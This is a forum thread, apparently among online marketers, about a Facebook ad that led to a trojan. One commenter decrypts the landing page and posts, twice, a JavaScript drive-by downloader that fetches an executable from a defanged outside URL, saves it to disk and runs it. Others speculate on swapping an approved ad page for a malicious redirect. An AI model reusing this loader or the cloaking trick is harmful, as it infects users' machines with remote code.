His ad sucks for someone trying to spread something like that to the masses. Unless he's purposely targeting iphone app developers. Even so, pretty slick. Respek for creativity! But when FB nabs him, if he's using his real CC he's gonna be fucked.
man facebook will approve a trojan but not some flog landers..... this is an outrage.
You really think he used the same url to get the ad approved? He definitely just used a normal page and then once approved replaced it with a redirect to his page with the trojan.man facebook will approve a trojan but not some flog landers..... this is an outrage.
^^^ This sucks. What could they be profiting from Trojan, key loggers?
that ad is pretty weird. you need mac os x to develop iphone apps, and that trojan is only for windows, right?
Macs can get trojans. It got through Internal Facebook and they all use Macs. And it's targeting iPhone App developers, ergo they use Macs as well. So the puzzle is coming together. Deliver a trojan that quietly infects Macs, and start fucking data mining internal Facebook and whoever else clicks.
function VdAQqREvJk() {
try{
var downloadPath = 'c:\\fBrKWbU.exe';
var obj = XExpCore.getTargetObj('ADODB.Stream');
if( obj && XExpCore.Shell != null && XExpCore.XmlHttp != null ) {
var contentBinary = XExpCore.httpDownload( 'hXXp://ea.widlil.net/download/CADB64A9/160B9C0FE915BF66ED51FC993DF50835/48D2F110-0C0C-433d-AA87-15BBFBD59129' );
if( contentBinary != null ) {
obj.Type = 1; obj.Mode = 3;
obj.Open(); obj.Write( contentBinary );
obj.SaveToFile( downloadPath, 2);
obj.Close();
return XExpCore.shellExecute( downloadPath );
}
}
}catch(e) {}
return false;
}
I just visited the page and its a big ass javascript thats encrypted. I just did a quick decrypt and here is where the magic happens. Def a virus for PC yet targeting mac users. Note the file it attempts to download. I XX'd out the url just in case.
Code:function VdAQqREvJk() { try{ var downloadPath = 'c:\\fBrKWbU.exe'; var obj = XExpCore.getTargetObj('ADODB.Stream'); if( obj && XExpCore.Shell != null && XExpCore.XmlHttp != null ) { var contentBinary = XExpCore.httpDownload( 'hXXp://ea.widlil.net/download/CADB64A9/160B9C0FE915BF66ED51FC993DF50835/48D2F110-0C0C-433d-AA87-15BBFBD59129' ); if( contentBinary != null ) { obj.Type = 1; obj.Mode = 3; obj.Open(); obj.Write( contentBinary ); obj.SaveToFile( downloadPath, 2); obj.Close(); return XExpCore.shellExecute( downloadPath ); } } }catch(e) {} return false; }
man facebook will approve a trojan but not some flog landers..... this is an outrage.